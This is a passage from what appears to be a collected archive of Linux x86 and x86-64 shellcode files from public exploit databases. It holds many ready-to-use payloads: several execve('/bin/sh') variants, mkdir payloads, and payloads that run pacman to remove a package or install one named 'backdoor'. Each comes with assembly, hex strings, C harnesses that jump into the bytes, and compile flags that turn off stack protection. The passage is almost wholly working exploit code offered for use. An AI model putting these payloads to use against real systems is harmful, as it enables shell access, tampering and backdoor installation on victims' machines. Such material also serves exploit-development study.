(the “Software”), 7 | ;to deal in the Software without restriction, including without limitation 8 | ;the rights to use, copy, modify, merge, publish, distribute, sublicense, 9 | ;and/or sell copies of the Software, and to permit persons to whom the 10 | ;Software is furnished to do so, subject to the following conditions: 11 | 12 | ;The above copyright notice and this permission notice shall be included 13 | ;in all copies or substantial portions of the Software. 14 | 15 | ;The Software is provided “as is”, without warranty of any kind, express or 16 | ;implied, including but not limited to the warranties of merchantability, 17 | ;fitness for a particular purpose and noninfringement. In no event shall the 18 | ;authors or copyright holders be liable for any claim, damages or other 19 | ;liability, whether in an action of contract, tort or otherwise, arising 20 | ;from, out of or in connection with the software or the use or other 21 | ;dealings in the Software. 22 | ; 23 | ; For a detailed explanation of this shellcode see my blog post: 24 | ; http://a41l4.blogspot.ca/2017/01/execvestack1434.html 25 | global _start 26 | 27 | section .text 28 | 29 | _start: 30 | ; zeros RAX, RDX and RSI with only 4 bytes of machine code 31 | xor esi,esi 32 | mul esi 33 | 34 | ; null terminator for the following string 35 | push rax 36 | 37 | ; push /bin//sh in reverse 38 | mov rbx,'/bin//sh' 39 | push rbx 40 | 41 | ; store /bin//sh address in RDI, points at string 42 | push rsp 43 | pop rdi 44 | 45 | ; Call the Execve syscall 46 | mov al, 59 47 | syscall -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Category: Shellcode 3 | ;Title: GNU/Linux x86_64 - execve /bin/sh 4 | ;Author: m4n3dw0lf 5 | ;Github: https://github.com/m4n3dw0lf 6 | ;Date: 14/06/2017 7 | ;Architecture: Linux x86_64 8 | ;Tested on : #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux 9 | 10 | ########## 11 | # Source # 12 | ########## 13 | 14 | section .text 15 | global _start 16 | _start: 17 | push rax 18 | xor rdx, rdx 19 | xor rsi, rsi 20 | mov rbx,'/bin//sh' 21 | push rbx 22 | push rsp 23 | pop rdi 24 | mov al, 59 25 | syscall 26 | 27 | 28 | ################################# 29 | # Compile and execute with NASM # 30 | ################################# 31 | 32 | nasm -f elf64 sh.s -o sh.o 33 | ld sh.o -o sh 34 | 35 | ######################### 36 | # objdump --disassemble # 37 | ######################### 38 | 39 | Disassembly of section .text: 40 | 41 | 0000000000400080 <_start>: 42 | 400080: 50 push %rax 43 | 400081: 48 31 d2 xor %rdx,%rdx 44 | 400084: 48 31 f6 xor %rsi,%rsi 45 | 400087: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 46 | 40008e: 2f 73 68 47 | 400091: 53 push %rbx 48 | 400092: 54 push %rsp 49 | 400093: 5f pop %rdi 50 | 400094: b0 3b mov $0x3b,%al 51 | 400096: 0f 05 syscall 52 | 53 | ###################### 54 | # 24 Bytes Shellcode # 55 | ###################### 56 | 57 | \x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05 58 | 59 | ######## 60 | # Test # 61 | ######## 62 | 63 | gcc -fno-stack-protector -z execstack shell.c -o shell 64 | 65 | */ 66 | 67 | #include 68 | 69 | unsigned char shellcode[] = \ 70 | "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; 71 | main() 72 | { 73 | int (*ret)() = (int(*)())shellcode; 74 | ret(); 75 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | --------------------------------------------------------------------------------------------------- 3 | 4 | Linux/x86_x64 - execve(/bin/sh) - 25 bytes 5 | 6 | Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] 7 | 8 | Om Asato Maa Sad-Gamaya | 9 | Tamaso Maa Jyotir-Gamaya | 10 | Mrtyor-Maa Amrtam Gamaya | 11 | Om Shaantih Shaantih Shaantih | 12 | 13 | Thanks for Unknown Commented in my Blog 14 | 15 | --------------------------------------------------------------------------------------------------- 16 | Disassembly of section .text: 17 | 18 | 0000000000400080 <.text>: 19 | 400080: eb 0b jmp 0x40008d 20 | 400082: 5f pop rdi 21 | 400083: 48 31 d2 xor rdx,rdx 22 | 400086: 52 push rdx 23 | 400087: 5e pop rsi 24 | 400088: 6a 3b push 0x3b 25 | 40008a: 58 pop rax 26 | 40008b: 0f 05 syscall 27 | 40008d: e8 f0 ff ff ff call 0x400082 28 | 400092: 2f (bad) 29 | 400093: 62 (bad) 30 | 400094: 69 .byte 0x69 31 | 400095: 6e outs dx,BYTE PTR ds:[rsi] 32 | 400096: 2f (bad) 33 | 400097: 73 68 jae 0x400101 34 | --------------------------------------------------------------------------------------------------- 35 | 36 | How To Run 37 | 38 | $ gcc -o sh_shell sh_shell.c 39 | $ execstack -s sh_shell 40 | $ ./sh_shell 41 | 42 | --------------------------------------------------------------------------------------------------- 43 | */ 44 | #include 45 | char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; 46 | void main(int argc, char **argv) 47 | { 48 | int (*func)(); 49 | func = (int (*)()) sh; 50 | (int)(*func)(); 51 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___2___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | /* 5 | by Magnefikko 6 | 14.04.2010 7 | magnefikko@gmail.com 8 | promhyl.oz.pl 9 | Subgroup: #PRekambr 10 | Name: 25 bytes execve("/bin/sh") shellcode 11 | Platform: Linux x86 12 | 13 | execve("/bin/sh", 0, 0); 14 | gcc -Wl,-z,execstack filename.c 15 | 16 | shellcode: 17 | 18 | \xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 19 | 20 | */ 21 | 22 | 23 | int main(){ 24 | char shell[] = 25 | "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; 26 | printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.oz.pl\n\nstrlen(shell) 27 | = %d\n", strlen(shell)); 28 | (*(void (*)()) shell)(); 29 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__26_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | --------------------------------------------------------------------------------------------------- 3 | 4 | Linux/x86_x64 - execve(/bin/sh) - 26 bytes 5 | 6 | Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] 7 | 8 | Om Asato Maa Sad-Gamaya | 9 | Tamaso Maa Jyotir-Gamaya | 10 | Mrtyor-Maa Amrtam Gamaya | 11 | Om Shaantih Shaantih Shaantih | 12 | 13 | --------------------------------------------------------------------------------------------------- 14 | Disassembly of section .text: 15 | 16 | 0000000000400080 <.text>: 17 | 400080: eb 0b jmp 0x40008d 18 | 400082: 5f pop %rdi 19 | 400083: 48 31 d2 xor %rdx,%rdx 20 | 400086: 48 89 d6 mov %rdx,%rsi 21 | 400089: b0 3b mov $0x3b,%al 22 | 40008b: 0f 05 syscall 23 | 40008d: e8 f0 ff ff ff callq 0x400082 24 | 400092: 2f (bad) 25 | 400093: 2f (bad) 26 | 400094: 62 (bad) 27 | 400095: 69 .byte 0x69 28 | 400096: 6e outsb %ds:(%rsi),(%dx) 29 | 400097: 2f (bad) 30 | 400098: 73 68 jae 0x400102 31 | --------------------------------------------------------------------------------------------------- 32 | 33 | How To Run 34 | 35 | $ gcc -o sh_shell sh_shell.c 36 | $ execstack -s sh_shell 37 | $ ./sh_shell 38 | 39 | --------------------------------------------------------------------------------------------------- 40 | */ 41 | #include 42 | char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68"; 43 | void main(int argc, char **argv) 44 | { 45 | int (*func)(); 46 | func = (int (*)()) sh; 47 | (int)(*func)(); 48 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode 2 | # Date: 2010-04-26 3 | # Author: zbt 4 | # Tested on: x86_64 Debian GNU/Linux 5 | 6 | /* 7 | ; execve("/bin/sh", ["/bin/sh"], NULL) 8 | 9 | section .text 10 | global _start 11 | 12 | _start: 13 | xor rdx, rdx 14 | mov qword rbx, '//bin/sh' 15 | shr rbx, 0x8 16 | push rbx 17 | mov rdi, rsp 18 | push rax 19 | push rdi 20 | mov rsi, rsp 21 | mov al, 0x3b 22 | syscall 23 | */ 24 | 25 | int main(void) 26 | { 27 | char shellcode[] = 28 | "\x48\x31\xd2" // xor %rdx, %rdx 29 | "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov 30 | $0x68732f6e69622f2f, %rbx 31 | "\x48\xc1\xeb\x08" // shr $0x8, %rbx 32 | "\x53" // push %rbx 33 | "\x48\x89\xe7" // mov %rsp, %rdi 34 | "\x50" // push %rax 35 | "\x57" // push %rdi 36 | "\x48\x89\xe6" // mov %rsp, %rsi 37 | "\xb0\x3b" // mov $0x3b, %al 38 | "\x0f\x05"; // syscall 39 | 40 | (*(void (*)()) shellcode)(); 41 | 42 | return 0; 43 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__31_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86-64 - /bin/sh Shellcode 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://github.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86_64 7 | ;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes. 8 | ;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04) 9 | 10 | 11 | 12 | ===COMPILATION AND EXECUTION=== 13 | #nasm -f elf64 shell.asm -o shell.o 14 | 15 | #ld shell.o -o shell <=== Making Binary File 16 | 17 | 18 | #./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell) 19 | 20 | =================SHELLCODE(INTEL FORMAT)================= 21 | 22 | section .text 23 | global _start 24 | _start: 25 | jmp shell 26 | here: 27 | xor rax,rax 28 | pop rdi 29 | xor rsi,rsi 30 | xor rdx,rdx 31 | add rax,59 32 | syscall 33 | shell: 34 | call here 35 | bash db "/bin//sh" 36 | 37 | ===================END HERE============================ 38 | 39 | Compile with gcc with some options. 40 | 41 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 42 | 43 | 44 | */ 45 | 46 | #include 47 | #include 48 | 49 | unsigned char code[] = \ 50 | "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"; 51 | 52 | main() 53 | { 54 | printf("Touhid Shaikh (http://www.touhidshaikh.com)\n"); 55 | printf("Shellcode Length : %d\n", (int)strlen(code)); 56 | 57 | int (*ret)() = (int(*)())code; 58 | 59 | ret(); 60 | 61 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # [Linux/X86-64] 2 | # Dummy for shellcode: 3 | # execve("/bin/sh", ["/bin/sh"], NULL) 4 | # hophet [at] gmail.com 5 | 6 | .text 7 | .globl _start 8 | _start: 9 | 10 | xorq %rdx, %rdx 11 | movq $0x68732f6e69622fff,%rbx 12 | shr $0x8, %rbx 13 | push %rbx 14 | movq %rsp,%rdi 15 | xorq %rax,%rax 16 | pushq %rax 17 | pushq %rdi 18 | movq %rsp,%rsi 19 | mov $0x3b,%al # execve(3b) 20 | syscall 21 | 22 | pushq $0x1 23 | pop %rdi 24 | pushq $0x3c # exit(3c) 25 | pop %rax 26 | syscall 27 | 28 | 29 | # milw0rm.com [2006-11-02] -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__34_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach) 2 | # Date: 2015-09-10 3 | # Exploit Author: Fanda Uchytil 4 | # Version: 1 5 | # Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian) 6 | 7 | 8 | AT&T VERSION (for smooth debug) 9 | ------------------------------- 10 | 11 | .global _start 12 | .text 13 | _start: 14 | # int execve(const char *filename, char *const argv[], char *const envp[]); 15 | xor %rax, %rax 16 | add $59, %rax # Linux 64b execve 17 | xor %rdi, %rdi 18 | push %rdi # '\0' for termination of string below 19 | mov $0x68732F2f6e69622F, %rdi # "/bin//sh" (slash padding) 20 | push %rdi 21 | lea (%rsp), %rdi 22 | xor %rsi, %rsi # no shell arguments 23 | xor %rdx, %rdx # no env vars 24 | syscall 25 | 26 | 27 | $ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt 28 | $ ./shellcode_atnt 29 | $ gdb -q ./shellcode_atnt 30 | 31 | 32 | Disassembly of section .text: 33 | 4000d4: 48 31 c0 xor %rax,%rax 34 | 4000d7: 48 83 c0 3b add $0x3b,%rax 35 | 4000db: 48 31 ff xor %rdi,%rdi 36 | 4000de: 57 push %rdi 37 | 4000df: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi 38 | 4000e6: 2f 73 68 39 | 4000e9: 57 push %rdi 40 | 4000ea: 48 8d 3c 24 lea (%rsp),%rdi 41 | 4000ee: 48 31 f6 xor %rsi,%rsi 42 | 4000f1: 48 31 d2 xor %rdx,%rdx 43 | 4000f4: 0f 05 syscall 44 | 45 | 46 | 47 | 48 | INTEL VERSION 49 | ------------- 50 | 51 | BITS 64 52 | xor rax, rax 53 | add rax, 59 54 | xor rdi, rdi 55 | push rdi 56 | mov rdi, 0x68732F2f6e69622F 57 | push rdi 58 | lea rdi, [rsp] 59 | xor rsi, rsi 60 | xor rdx, rdx 61 | syscall 62 | 63 | 64 | $ nasm shellcode.a 65 | 66 | 67 | 68 | 69 | SHELLCODE_TEST.C 70 | ---------------- 71 | 72 | int main(int argc, char **argv) { 73 | int (*f)() = (int(*)()) argv[1]; 74 | return (*f)(); 75 | } 76 | 77 | 78 | $ gcc -o shellcode_test shellcode_test.c -z execstack # or use `execstack(8)` before command below 79 | $ ./shellcode_test "$(cat shellcode)" 80 | 81 | 82 | 83 | 84 | STRING 85 | ------ 86 | 87 | $ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g' 88 | \48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05 89 | 90 | $ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")" -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__52_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Exploit Title : linux/x86-64 execve(/bin/sh) 52 bytes 4 | Tested on : Linux iron 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux 5 | Date : 03/12/2011 6 | Author : X-h4ck 7 | Email : mem001@live.com 8 | Website : http://www.pirate.al 9 | Greetz : mywisdom - Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath 10 | ev1lut1on - bi0 - Slimshaddy - d3trimentaL - Lekosta 11 | CR - Hack-Down - H3ll - Pretorian - d4nte_sA 12 | 13 | */ 14 | 15 | 16 | char SC[] = "\xeb\x1d\x5b\x31\xc0\x67\x89\x43\x07\x67\x89\x5b\x08\x67\x89\x43\x0c"\ 17 | "\x31\xc0\xb0\x0b\x67\x8d\x4b\x08\x67\x8d\x53\x0c\xcd\x80\xe8\xde\xff"\ 18 | "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42"\ 19 | "\x42"; 20 | 21 | int 22 | main (int argc, char **argv) 23 | { 24 | int (*ret)(); 25 | ret = (int(*)())SC; 26 | 27 | (int)(*ret)(); 28 | exit(0); 29 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Via_Push_Shellcode__23_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | # 3 | # Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes) 4 | # 5 | # Dying to be the shortest. 6 | # 7 | # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com) 8 | # 9 | # 27 April 2015 10 | # 11 | # GPL 12 | # 13 | 14 | 15 | .global _start 16 | _start: 17 | # char *const argv[] 18 | xorl %esi, %esi 19 | 20 | # 'h' 's' '/' '/' 'n' 'i' 'b' '/' 21 | movq $0x68732f2f6e69622f, %rbx 22 | 23 | # for '\x00' 24 | pushq %rsi 25 | 26 | pushq %rbx 27 | 28 | pushq %rsp 29 | # const char *filename 30 | popq %rdi 31 | 32 | # __NR_execve 59 33 | pushq $59 34 | popq %rax 35 | 36 | # char *const envp[] 37 | xorl %edx, %edx 38 | 39 | syscall 40 | */ 41 | 42 | /* 43 | gcc -z execstack push64.c 44 | 45 | uname -r 46 | 3.19.3-3-ARCH 47 | */ 48 | 49 | #include 50 | #include 51 | 52 | int 53 | main(void) 54 | { 55 | char *shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56" 56 | "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"; 57 | 58 | printf("strlen(shellcode)=%d\n", strlen(shellcode)); 59 | 60 | ((void (*)(void))shellcode)(); 61 | 62 | return 0; 63 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_mkdir_Shellcode__25_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | --------------------------------------------------------------------------------------------------- 3 | 4 | Linux/x86_x64 - mkdir("ajit", 755) - 25 bytes 5 | 6 | Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] 7 | Vishnu Nath Kp [ http://www.terminalcoders.blogspot.com ] 8 | Sayooj S Nambiar [ http://fb.com/sayooj.sivadas ] 9 | 10 | Om Asato Maa Sad-Gamaya | 11 | Tamaso Maa Jyotir-Gamaya | 12 | Mrtyor-Maa Amrtam Gamaya | 13 | Om Shaantih Shaantih Shaantih | 14 | 15 | --------------------------------------------------------------------------------------------------- 16 | Disassembly of section .text: 17 | 18 | 0000000000400080 <.text>: 19 | 400080: 48 31 f6 xor %rsi,%rsi 20 | 400083: 56 push %rsi 21 | 400084: 68 61 6a 69 74 pushq $0x74696a61 22 | 400089: 54 push %rsp 23 | 40008a: 5f pop %rdi 24 | 40008b: 6a 53 pushq $0x53 25 | 40008d: 58 pop %rax 26 | 40008e: 66 be ef 01 mov $0x1ef,%si 27 | 400092: 0f 05 syscall 28 | 400094: 6a 3c pushq $0x3c 29 | 400096: 58 pop %rax 30 | 400097: 0f 05 syscall 31 | --------------------------------------------------------------------------------------------------- 32 | 33 | How To Run 34 | 35 | $ gcc -o mkdir_shellcode_linux_x64 mkdir_shellcode_linux_x64.c -z execstack 36 | $ ./mkdir_shellcode_linux_x64 37 | 38 | --------------------------------------------------------------------------------------------------- 39 | */ 40 | #include 41 | char sh[]="\x48\x31\xf6\x56\x68\x61\x6a\x69\x74\x54\x5f\x6a\x53\x58\x66\xbe\xef\x01\x0f\x05\x6a\x3c\x58\x0f\x05"; 42 | void main(int argc, char **argv) 43 | { 44 | int (*func)(); 45 | func = (int (*)()) sh; 46 | (int)(*func)(); 47 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_mkdir____evil__Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86_64 - mkdir() shellcode (30 bytes) 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: *https://github.com/touhidshaikh 5 | * 6 | ;Category: Shellcode 7 | ;Architecture: Linux x86_64 8 | ;Description: Create Folder with 755 permission. 9 | ; You can Change folder by change code in ASM in fname Field 10 | ;Shellcode Length: 30 11 | ;Tested on : Debian 4.12.6-1kali6 (2017-08-30) x86_64 GNU/Linux 12 | 13 | 14 | 15 | ===== COMPILATION AND EXECUTION Assemmbly file ===== 16 | 17 | #nasm -f elf64 shell.asm -o shell.o <=== Making Object File 18 | 19 | #ld shell.o -o shell <=== Making Binary File 20 | 21 | #./bin2shell.sh shell <== xtract hex code from the binary 22 | (https://github.com/touhidshaikh/bin2shell) 23 | 24 | =================SHELLCODE(INTEL FORMAT)================= 25 | 26 | section .text 27 | global _start 28 | _start: 29 | jmp folder 30 | main: 31 | xor rax,rax 32 | pop rdi 33 | mov si,0x1ef ;<--- Set Permission 34 | add al,83 35 | syscall 36 | 37 | xor rax,rax 38 | add al,60 39 | syscall 40 | folder: 41 | call main 42 | fname db "evil" ;<---Change Folder Name Here 43 | 44 | 45 | =======================END HERE============================ 46 | 47 | ====================FOR C Compile=========================== 48 | 49 | Compile with gcc with some options. 50 | 51 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 52 | 53 | */ 54 | 55 | #include 56 | #include 57 | 58 | 59 | unsigned char code[] = "\xeb\x13\x48\x31\xc0\x5f\x66\ 60 | xbe\xef\x01\x04\x53\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\ 61 | xe8\xe8\xff\xff\xff\x65\x76\x69\x6c"; 62 | 63 | main() 64 | { 65 | 66 | printf("Shellcode Length: %d\n", (int)strlen(code)); 67 | 68 | int (*ret)() = (int(*)())code; 69 | 70 | ret(); 71 | 72 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_IA32_-_execve__bin_sh_0xff-Free_Shellcode__45_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | 0xff-less execve() /bin/sh by anathema 4 | 5 | */ 6 | 7 | #include 8 | #include 9 | 10 | unsigned char code[] = 11 | 12 | /* Linux/IA32 0xff-less execve() shellcode. */ 13 | 14 | "\x89\xe6" /* movl %esp, %esi */ 15 | "\x83\xc6\x30" /* addl $0x30, %esi */ 16 | "\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */ 17 | "\x40" /* incl %eax */ 18 | "\x89\x06" /* movl %eax, (%esi) */ 19 | "\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */ 20 | "\x40" /* incl %eax */ 21 | "\x89\x46\x04" /* movl %eax, 0x04(%esi) */ 22 | "\x29\xc0" /* subl %eax, %eax */ 23 | "\x88\x46\x07" /* movb %al, 0x07(%esi) */ 24 | "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ 25 | "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ 26 | "\xb0\x0b" /* movb $0x0b, %al */ 27 | "\x87\xf3" /* xchgl %esi, %ebx */ 28 | "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ 29 | "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ 30 | "\xcd\x80" /* int $0x80 */ 31 | ; 32 | 33 | void main() 34 | { 35 | void (*s)() = (void *)code; 36 | 37 | printf("Shellcode length: %d\nExecuting..\n\n", 38 | strlen(code)); 39 | s(); 40 | } 41 | 42 | // milw0rm.com [2004-09-26] -------------------------------------------------------------------------------- /Lin_x86/Linux_i686_-_pacman_-R__package__Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Linux i686 - pacman -R - 59 bytes 3 | Author : Jonathan Salwan 4 | Mail : submit [!] shell-storm.org 5 | Web : http://www.shell-storm.org 6 | 7 | Pacman is a software package manager, developed as part of the Arch Linux distribution. 8 | With this shellcode you can remove the packages. 9 | 10 | ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! 11 | 12 | 13 | Disassembly of section .text: 14 | 15 | 08048054 <.text>: 16 | 8048054: 31 c0 xor %eax,%eax 17 | 8048056: 31 db xor %ebx,%ebx 18 | 8048058: 31 c9 xor %ecx,%ecx 19 | 804805a: 31 d2 xor %edx,%edx 20 | 804805c: 31 f6 xor %esi,%esi 21 | 804805e: 52 push %edx 22 | 804805f: 68 61 61 61 61 push $0x61616161 23 | 8048064: 89 e6 mov %esp,%esi 24 | 8048066: 52 push %edx 25 | 8048067: 66 68 2d 52 pushw $0x522d 26 | 804806b: 89 e1 mov %esp,%ecx 27 | 804806d: 52 push %edx 28 | 804806e: 68 63 6d 61 6e push $0x6e616d63 29 | 8048073: 68 6e 2f 70 61 push $0x61702f6e 30 | 8048078: 68 72 2f 62 69 push $0x69622f72 31 | 804807d: 68 2f 2f 75 73 push $0x73752f2f 32 | 8048082: 89 e3 mov %esp,%ebx 33 | 8048084: 52 push %edx 34 | 8048085: 56 push %esi 35 | 8048086: 51 push %ecx 36 | 8048087: 53 push %ebx 37 | 8048088: 89 e1 mov %esp,%ecx 38 | 804808a: b0 0b mov $0xb,%al 39 | 804808c: 99 cltd 40 | 804808d: cd 80 int $0x80 41 | 42 | */ 43 | 44 | 45 | #include 46 | 47 | int main(void) 48 | { 49 | char shellcode[] = 50 | 51 | "\x31\xc0\x31\xdb\x31\xc9\x31" 52 | "\xd2\x31\xf6\x52\x68" 53 | "\x61\x61\x61\x61" // <- package is "aaaa", you can change it. 54 | "\x89\xe6\x52\x66\x68\x2d\x52" 55 | "\x89\xe1\x52\x68\x63\x6d\x61" 56 | "\x6e\x68\x6e\x2f\x70\x61\x68" 57 | "\x72\x2f\x62\x69\x68\x2f\x2f" 58 | "\x75\x73\x89\xe3\x52\x56\x51" 59 | "\x53\x89\xe1\xb0\x0b\x99\xcd" 60 | "\x80"; 61 | 62 | printf("Length: %d\n",strlen(shellcode)); 63 | (*(void(*)()) shellcode)(); 64 | 65 | return 0; 66 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_i686_-_pacman_-S__package___default_package:_backdoor__Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Linux i686 - pacman -S (default package: backdoor) - 64 bytes 3 | Author : Jonathan Salwan 4 | Mail : submit [!] shell-storm.org 5 | Web : http://www.shell-storm.org 6 | 7 | Pacman is a software package manager, developed as part of the Arch Linux distribution. 8 | With this shellcode you can install the backdoor packages. 9 | 10 | ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ ! 11 | 12 | 13 | Disassembly of section .text: 14 | 15 | 08048054 <.text>: 16 | 8048054: 31 c0 xor %eax,%eax 17 | 8048056: 31 db xor %ebx,%ebx 18 | 8048058: 31 c9 xor %ecx,%ecx 19 | 804805a: 31 d2 xor %edx,%edx 20 | 804805c: 31 f6 xor %esi,%esi 21 | 804805e: 52 push %edx 22 | 804805f: 68 64 6f 6f 72 push $0x726f6f64 << This is a package 23 | 8048064: 68 62 61 63 6b push $0x6b636162 << (backdoor). You can change it. 24 | 8048069: 89 e6 mov %esp,%esi 25 | 804806b: 52 push %edx 26 | 804806c: 66 68 2d 53 pushw $0x532d 27 | 8048070: 89 e1 mov %esp,%ecx 28 | 8048072: 52 push %edx 29 | 8048073: 68 63 6d 61 6e push $0x6e616d63 30 | 8048078: 68 6e 2f 70 61 push $0x61702f6e 31 | 804807d: 68 72 2f 62 69 push $0x69622f72 32 | 8048082: 68 2f 2f 75 73 push $0x73752f2f 33 | 8048087: 89 e3 mov %esp,%ebx 34 | 8048089: 52 push %edx 35 | 804808a: 56 push %esi 36 | 804808b: 51 push %ecx 37 | 804808c: 53 push %ebx 38 | 804808d: 89 e1 mov %esp,%ecx 39 | 804808f: b0 0b mov $0xb,%al 40 | 8048091: 99 cltd 41 | 8048092: cd 80 int $0x80 42 | 43 | 44 | */ 45 | 46 | 47 | #include 48 | 49 | int main(void) 50 | { 51 | char shellcode[] = 52 | 53 | "\x31\xc0\x31\xdb\x31\xc9\x31" 54 | "\xd2\x31\xf6\x52\x68\x64\x6f" 55 | "\x6f\x72\x68\x62\x61\x63\x6b" 56 | "\x89\xe6\x52\x66\x68\x2d\x52" 57 | "\x89\xe1\x52\x68\x63\x6d\x61" 58 | 